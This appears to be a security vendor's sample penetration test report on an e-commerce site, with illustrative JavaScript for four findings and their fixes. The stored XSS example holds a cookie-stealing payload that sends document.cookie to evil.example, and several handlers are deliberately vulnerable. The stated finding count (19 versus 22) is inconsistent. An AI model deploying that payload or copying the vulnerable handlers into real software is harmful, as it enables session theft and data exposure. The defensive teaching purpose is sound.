Sample Assessment Report
Redacted for confidentiality
Application Security
Web Application Penetration Testing
Confidential Client — E-Commerce Platform
Scope: Primary e-commerce web application (authenticated + unauthenticated), admin portal, checkout and payment flows
Duration: 8 business days
Methodology: OWASP Testing Guide v4.2
Executive Summary
UnlockSec performed a manual web application penetration test of the client's e-commerce platform. The engagement uncovered 2 Critical vulnerabilities: an IDOR that exposed any customer's order and payment details, and a stored XSS in the product review system with a clear path to session hijacking. 19 findings were identified in total, including 2 business logic flaws in the checkout flow that enabled price manipulation.
Methodology
Sample Findings
IDOR — Horizontal Privilege Escalation on Order API
Description
The /api/v1/orders/{orderId} endpoint does not validate that the authenticated user is the owner of the requested order. By iterating the numeric orderId parameter, an attacker can retrieve full order details, shipping addresses, and partial payment information for any customer.
Recommendation
Enforce server-side ownership checks on every object reference: the order must belong to the authenticated user, or the user must hold an explicit role that permits access, and non-owned objects should get the same response as non-existent ones. Replacing sequential numeric IDs with UUIDs or random tokens makes enumeration impractical, but it is defence in depth, not a substitute for the authorization check. Add rate limiting and anomaly detection (for example, alerting when one session requests many distinct order IDs) on sensitive API endpoints.
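As an added illustration (not code from the report or the client application), the handler below models the /api/v1/orders/{orderId} lookup in both forms. The order table, user identifiers and session shape are constructed for the example; the only difference between the two handlers is that the secure one makes ownership part of the lookup and returns 404 for both missing and non-owned orders.

```javascript
// Added example, not the report's code. Constructed in-memory order table;
// a real deployment would query a database.
const ORDERS = new Map([
  [1001, { id: 1001, ownerId: 'user-alice', total: 249.0, shipTo: '12 Elm St' }],
  [1002, { id: 1002, ownerId: 'user-bob', total: 1899.0, shipTo: '7 Oak Ave' }],
  [1003, { id: 1003, ownerId: 'user-carol', total: 59.0, shipTo: '3 Pine Rd' }],
]);

// Vulnerable: authenticates the caller but looks the order up by id alone,
// so any logged-in user can iterate orderId and read every customer's order.
function getOrderVulnerable(session, orderId) {
  if (!session || !session.userId) return { status: 401 };
  const order = ORDERS.get(Number(orderId));
  return order ? { status: 200, body: order } : { status: 404 };
}

// Secure: the ownership predicate is part of the lookup. A request for
// someone else's order is answered exactly like a missing one (404, not 403),
// so the response does not confirm that the id exists. Staff with an explicit
// 'support' role may read any order; the role is an assumed name.
function getOrderSecure(session, orderId) {
  if (!session || !session.userId) return { status: 401 };
  const id = Number(orderId);
  if (!Number.isInteger(id) || id <= 0) return { status: 400 };
  const order = ORDERS.get(id);
  const roles = Array.isArray(session.roles) ? session.roles : [];
  const permitted = order && (order.ownerId === session.userId || roles.includes('support'));
  if (!permitted) return { status: 404 };
  return { status: 200, body: order };
}

// Models the enumeration a tester would run: sweep an id range with one
// session and count how many orders come back. Used to compare the handlers.
function countReadable(session, handler, from, to) {
  let readable = 0;
  for (let id = from; id <= to; id++) {
    if (handler(session, id).status === 200) readable += 1;
  }
  return readable;
}
```

The enumeration helper is the check a practitioner wants after the fix: one customer session should be able to read exactly its own orders across the full id range, and an unauthenticated sweep should read none.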
Stored XSS — Product Reviews with Session Hijacking Path
Description
Product review content is stored without sanitisation and rendered without encoding in the product listing pages. An attacker can submit a review containing malicious JavaScript that executes in the browser of any user viewing the product. The application session cookie lacks the HttpOnly flag, enabling full session theft.
Recommendation
Apply context-sensitive output encoding at render time (the templating engine's auto-escaping for HTML body and attribute contexts). If reviews must support rich text, sanitise the stored HTML with a maintained sanitiser such as DOMPurify, and still encode every other value. Set the HttpOnly and Secure flags, and a SameSite attribute, on all session cookies. Deploy a strict Content Security Policy that disallows inline scripts, which limits the impact of any encoding gap that remains.
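As an added example (not code from the report or the client application), the functions below show the review rendering in its vulnerable and encoded forms, alongside the cookie and header values the recommendation calls for. The review payload, cookie name and header set are constructed for the example.

```javascript
// Added example, not the report's code. Constructed attacker review: the
// script tag would run in every viewer's browser and read document.cookie
// if the session cookie lacks HttpOnly.
const HOSTILE_REVIEW = {
  author: 'attacker',
  body: 'Great product!<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
};

// Vulnerable: raw string interpolation, no encoding. The stored <script>
// becomes live markup in the product listing page.
function renderReviewVulnerable(review) {
  return `<div class="review"><b>${review.author}</b>: ${review.body}</div>`;
}

// Output encoding for the HTML body/attribute context: every character that
// can change document structure becomes an entity, so the payload is shown
// as text instead of parsed as markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: the same template, with each untrusted value encoded for the
// context it lands in.
function renderReviewSecure(review) {
  return `<div class="review"><b>${escapeHtml(review.author)}</b>: ${escapeHtml(review.body)}</div>`;
}

// Session cookie attributes from the recommendation: HttpOnly keeps script
// from reading it, Secure limits it to HTTPS, SameSite=Lax blocks most
// cross-site sends. Cookie name 'session' is an assumed value.
function sessionCookieHeader(sessionId, maxAgeSeconds = 3600) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; Max-Age=${maxAgeSeconds}; HttpOnly; Secure; SameSite=Lax`;
}

// Strict CSP: no inline script, scripts only from the site's own origin.
// Even if an encoding gap survives, an injected <script> will not execute.
function securityHeaders() {
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
    'X-Content-Type-Options': 'nosniff',
  };
}

// Crude check for a live script tag in rendered output; good enough to show
// the difference between the two renderers.
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}
```

Note that encoding is done at output, not on the stored review: encoding on input ties the data to one output context and breaks the moment the same review is rendered in JSON, an attribute, or an email.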
Business Logic — Negative Quantity Price Manipulation
Description
The checkout API accepts negative product quantities. Submitting a cart with a quantity of -1 for a high-value item reduces the total payable amount, potentially allowing items to be purchased for zero cost or a net credit to be applied to the account.
Recommendation
Validate all quantity fields server-side as positive integers (minimum 1, with a sensible per-line maximum) and reject the request rather than silently clamping. Recompute cart totals server-side at checkout from the trusted catalogue price and the validated quantity; never use client-supplied prices or totals.
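As an added example (not code from the report or the client application), the two total functions below show the arithmetic behind the finding and the hardened recomputation. The catalogue, SKUs and per-line maximum are constructed for the example.

```javascript
// Added example, not the report's code. Constructed catalogue: the server's
// trusted price list and stock levels.
const CATALOGUE = new Map([
  ['SKU-LAPTOP', { priceCents: 120000, stock: 5 }],
  ['SKU-CABLE', { priceCents: 999, stock: 500 }],
]);

// Assumed business limit; real values come from merchandising rules.
const MAX_QTY_PER_LINE = 20;

// Vulnerable: trusts both quantity and unit price from the client and sums
// them. A line with quantity -1 subtracts its price from the total.
function totalVulnerable(clientCart) {
  return clientCart.reduce((sum, line) => sum + line.quantity * line.unitPrice, 0);
}

// Hardened: every line is validated, the unit price is taken from the
// catalogue (the client's unitPrice field is ignored), and the total is
// computed in integer cents so float drift cannot be abused either.
function totalSecure(clientCart) {
  if (!Array.isArray(clientCart) || clientCart.length === 0) {
    throw new Error('cart must contain at least one line');
  }
  let cents = 0;
  for (const line of clientCart) {
    const item = CATALOGUE.get(line.sku);
    if (!item) throw new Error(`unknown sku ${String(line.sku)}`);
    const q = line.quantity;
    // Integer check rejects -1, 0, 1.5, "1", NaN and Infinity in one place.
    if (!Number.isInteger(q) || q < 1 || q > MAX_QTY_PER_LINE) {
      throw new Error(`invalid quantity for ${line.sku}`);
    }
    if (q > item.stock) throw new Error(`insufficient stock for ${line.sku}`);
    cents += q * item.priceCents;
  }
  return cents;
}

// Convenience for the caller: returns { ok, totalCents } or { ok, error }
// so the checkout handler can map validation failures to a 400 response.
function priceCart(clientCart) {
  try {
    return { ok: true, totalCents: totalSecure(clientCart) };
  } catch (err) {
    return { ok: false, error: err.message };
  }
}
```

Rejecting rather than clamping matters: a cart that silently becomes quantity 1 hides the tampering from the customer and from the fraud team, whereas a 400 with a logged reason is a signal worth alerting on.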
Missing Rate Limiting — Login Endpoint
Description
The /auth/login endpoint does not implement rate limiting or CAPTCHA for repeated failed authentication attempts. An attacker can perform automated credential stuffing or brute-force attacks without triggering account lockout.
Recommendation
Implement progressive rate limiting keyed on both the target account and the source IP: exponential backoff after 5 failed attempts, capped so that a legitimate user who is locked out recovers within minutes rather than being denied service indefinitely. Require a CAPTCHA after 3 consecutive failures. Check submitted email/password pairs against a breached-credential feed to catch known credential-stuffing pairs, and alert on distributed attempts that stay below the per-IP threshold.
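As an added example (not code from the report or the client application), the throttle below implements the thresholds in the recommendation: CAPTCHA after 3 failures, exponential backoff from the 5th failure, capped at 15 minutes, tracked separately per account and per source IP. The thresholds, key format and the credential check callback are assumptions made for the example.

```javascript
// Added example, not the report's code. Thresholds follow the recommendation;
// the cap is an assumed value.
const CAPTCHA_AFTER = 3;
const BACKOFF_AFTER = 5;
const BASE_DELAY_MS = 1000;
const MAX_DELAY_MS = 15 * 60 * 1000;

class LoginThrottle {
  constructor() {
    this.state = new Map(); // key -> { failures, blockedUntil }
  }

  // Returns whether an attempt under this key may proceed right now, whether
  // it must carry a solved CAPTCHA, and how long to wait if blocked.
  check(key, now) {
    const s = this.state.get(key) || { failures: 0, blockedUntil: 0 };
    if (now < s.blockedUntil) {
      return { allowed: false, requireCaptcha: true, retryAfterMs: s.blockedUntil - now };
    }
    return { allowed: true, requireCaptcha: s.failures >= CAPTCHA_AFTER, retryAfterMs: 0 };
  }

  // From the 5th failure on, the block doubles each time: 1s, 2s, 4s, ...
  // up to MAX_DELAY_MS, so a brute force slows to a crawl while a real user
  // who mistypes a few times is delayed for seconds, not locked out.
  recordFailure(key, now) {
    const s = this.state.get(key) || { failures: 0, blockedUntil: 0 };
    s.failures += 1;
    if (s.failures >= BACKOFF_AFTER) {
      const exponent = s.failures - BACKOFF_AFTER;
      s.blockedUntil = now + Math.min(BASE_DELAY_MS * 2 ** exponent, MAX_DELAY_MS);
    }
    this.state.set(key, s);
  }

  recordSuccess(key) {
    this.state.delete(key);
  }
}

// Wraps the credential check with both throttles. `verify(email, password)`
// is an assumed callback standing in for the real password check.
function attemptLogin(throttle, { email, ip, password, captchaSolved }, now, verify) {
  const accountKey = `acct:${String(email).trim().toLowerCase()}`;
  const ipKey = `ip:${ip}`;
  for (const key of [accountKey, ipKey]) {
    const c = throttle.check(key, now);
    if (!c.allowed) return { ok: false, reason: 'throttled', retryAfterMs: c.retryAfterMs };
    if (c.requireCaptcha && !captchaSolved) return { ok: false, reason: 'captcha_required' };
  }
  if (verify(email, password)) {
    // Reset only the account counter. Clearing the IP counter on success
    // would let an attacker who owns one valid account launder a stuffing run.
    throttle.recordSuccess(accountKey);
    return { ok: true };
  }
  throttle.recordFailure(accountKey, now);
  throttle.recordFailure(ipKey, now);
  return { ok: false, reason: 'bad_credentials' };
}
```

The per-IP counter is what stays behind after a successful login, which is why the last assertion in the check below still demands a CAPTCHA from the same address. In production the state map would live in a shared store so the limit holds across application instances.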
* Showing 4 of 22 total findings. Full report provided upon engagement.
Risk Summary
Deliverables Included
- Executive summary and business risk narrative
- Full OWASP Top 10 coverage report
- Annotated HTTP request/response evidence for all findings
- Developer-ready remediation guidance per finding
- Unlimited retests until all Critical and High findings are resolved
Ready for a real assessment?
Get a tailored Application Security engagement led by certified operators with unlimited retests.